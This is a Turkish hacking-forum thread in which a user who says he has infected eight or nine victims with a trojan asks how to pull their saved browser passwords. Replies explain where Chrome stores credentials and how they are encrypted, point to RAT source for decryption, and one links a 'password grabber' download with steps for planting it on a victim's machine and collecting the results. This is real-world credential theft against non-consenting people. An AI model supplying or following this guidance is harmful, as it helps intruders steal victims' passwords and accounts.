Zararlı Yazılım Şifre çekme

muratktk

muratktk

Yeni üye
21 Nis 2020
16
0
Aklıma takılan bir soru var elimde şuan 8-9 tane kurban var trojan yedirdim bunlara ratlar şifreleri doğru düzgün çekmiyor ben bunlara sen file and run yaparak başka bir programdan şifrelerini çekmek istiyorum nasıl yapabilirim direkt kayıtlı şifrelerini çekmek istiyorum ama normal keylogger gibi değil
 
Tarihe göre sırala Oylara göre sırala
Mapzilla

Mapzilla

Adanmış Üye
23 Eyl 2016
7,205
13
ratlar şifreleri doğru düzgün çekmiyor
Genişletmek için tıkla ...

Eski ve güncellenmemiş RAT'larda bu sorun görülür. Mesela Chrome parolalar için yöntem değiştiriyor. Chrome 80 sürümünden itibaren değişti mesela..
Chrome 80 sürümünden önce şöyleydi.
Parolaları SQL olarak saklıyordu ve şifreleme olarak DPAPI kullanıyordu.

C:\Users\kullaniciadi\AppData\Local\Google\Chrome\User Data\Default yerindeki `Login Data` dosyası lazım bize.

rnSikN.png


Burada bize lazım olan; logins tablosundaki origin_url, username_value ve password_value değerleridir.

rJv5Wc.png


NOT: Bu o bulunan PC'de kırılmalıdır, dosyayı çalarak yapmayın. DPAPI'nin mantığı budur.

Yeni Chrome'da C:\Users\kullaniciadi\AppData\Local\Google\Chrome\User Data yerindeki Local State JSON dosyasında saklanır. Bu sefer oradaki key DPAPI ile şifrelenir ve password_value versinin AES GCM key'ini içerir. İnternette %100 vardır, inceleyin. NanoCore gibi RAT'lara bakın.
 
Oyla 0 Downvote
muratktk

muratktk

Yeni üye
21 Nis 2020
16
0
Zilla' Alıntı:
Eski ve güncellenmemiş RAT'larda bu sorun görülür. Mesela Chrome parolalar için yöntem değiştiriyor. Chrome 80 sürümünden itibaren değişti mesela..
Chrome 80 sürümünden önce şöyleydi.
Parolaları SQL olarak saklıyordu ve şifreleme olarak DPAPI kullanıyordu.

C:\Users\kullaniciadi\AppData\Local\Google\Chrome\User Data\Default yerindeki `Login Data` dosyası lazım bize.

rnSikN.png


Burada bize lazım olan; logins tablosundaki origin_url, username_value ve password_value değerleridir.

rJv5Wc.png


NOT: Bu o bulunan PC'de kırılmalıdır, dosyayı çalarak yapmayın. DPAPI'nin mantığı budur.

Yeni Chrome'da C:\Users\kullaniciadi\AppData\Local\Google\Chrome\User Data yerindeki Local State JSON dosyasında saklanır. Bu sefer oradaki key DPAPI ile şifrelenir ve password_value versinin AES GCM key'ini içerir. İnternette %100 vardır, inceleyin. NanoCore gibi RAT'lara bakın.
Genişletmek için tıkla ...

blacknet php'den felan anlıyorsanız ulaşabileceğim bi adres varsa beni çok memnun edersiniz
 
Oyla 0 Downvote
Dargaaltay

Dargaaltay

Uzman üye
7 Mar 2019
1,747
407
Kainat
Twixter48' Alıntı:
şimdi sana vereceğim program ile kurbanların passwordlarını bırak çerez şifrelerini bile alırsın.

indir : https://s4.dosya.tc/server11/qd6m0y/Password_Grabber_v1.2.rar.html

peki nasıl kullanacaksın onuda anlatayım : [url=https://hizliresim.com/blKaPo][/URL]

masaüstüne build deyip virüsü oluşturduktan sonra kurbanın mypictures dosyasının içine atıcaksın trojanı daha sonra sürekli çalıştıra basacaksın pictures dosyasına password.txt dosyası gelir daha sonra onu downloand yaptıktan sonra pc nde açıp şifrelerine bakabilirsin

işine yararsa teşekür vermeyi unutma dostum :) şahsen bende önceden njrat kullanıyordum password çekmiyordu bu yöntemle alıyordum passları.
Genişletmek için tıkla ...

Virüs total paylaşabilir misin ? Twixter48
 
Oyla 0 Downvote
muratktk

muratktk

Yeni üye
21 Nis 2020
16
0
Twixter48' Alıntı:
tabi hocam unutmuşum kusuruma bakmayın

https://www.virustotal.com/gui/file...8b070645a35263dd09e98747110fde482c2/detection
Genişletmek için tıkla ...
Ustam Teşekkür ederim program için fakat gerçekten iyi alıyor değilmi gmail felan takır tukur alırmı :D

Twixter48' Alıntı:
tabi hocam unutmuşum kusuruma bakmayın

https://www.virustotal.com/gui/file...8b070645a35263dd09e98747110fde482c2/detection
Genişletmek için tıkla ...
Hocam Şifre vermiyor sadece eposta gösteriyor :D :(
 
Moderatör tarafında düzenlendi:
Oyla 0 Downvote
Twixter48

Twixter48

Katılımcı Üye
17 Tem 2016
298
3
muratktk' Alıntı:

Ustam Teşekkür ederim program için fakat gerçekten iyi alıyor değilmi gmail felan takır tukur alırmı :D


Hocam Şifre vermiyor sadece eposta gösteriyor :D :(
Genişletmek için tıkla ...

eğer sadece e-posta gösterirse kurban şifreleri kayıtlı değildir çerezden e-postalarını alıyordur

e-postaları bile çekiyor sen düşün artık

birde diğer kurbanlarda dene
 
Oyla 0 Downvote
J

jokkan

Katılımcı Üye
17 Nis 2020
255
10
muratktk' Alıntı:
Aklıma takılan bir soru var elimde şuan 8-9 tane kurban var trojan yedirdim bunlara ratlar şifreleri doğru düzgün çekmiyor ben bunlara sen file and run yaparak başka bir programdan şifrelerini çekmek istiyorum nasıl yapabilirim direkt kayıtlı şifrelerini çekmek istiyorum ama normal keylogger gibi değil
Genişletmek için tıkla ...

Yorumlarım kaldırılmış. Bu konunun takibindeyim, modlara şikayetimi ilettim.
 
Oyla 0 Downvote
muratktk

muratktk

Yeni üye
21 Nis 2020
16
0
jokkan' Alıntı:
Yorumlarım kaldırılmış. Bu konunun takibindeyim, modlara şikayetimi ilettim.
Genişletmek için tıkla ...

Hiç problem yok siz inatlaşmaya devam edin ben ne yaptığımı biliyorum sizi belli ki rahatsız etmiş gidin şikayetinizi edin hem durup dururken size ne batıyor? sizin deyiminizle bende "önlem" alma amaçlı bunları öğreniyorum kimseye zarar vermem :)
 
Oyla 0 Downvote
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.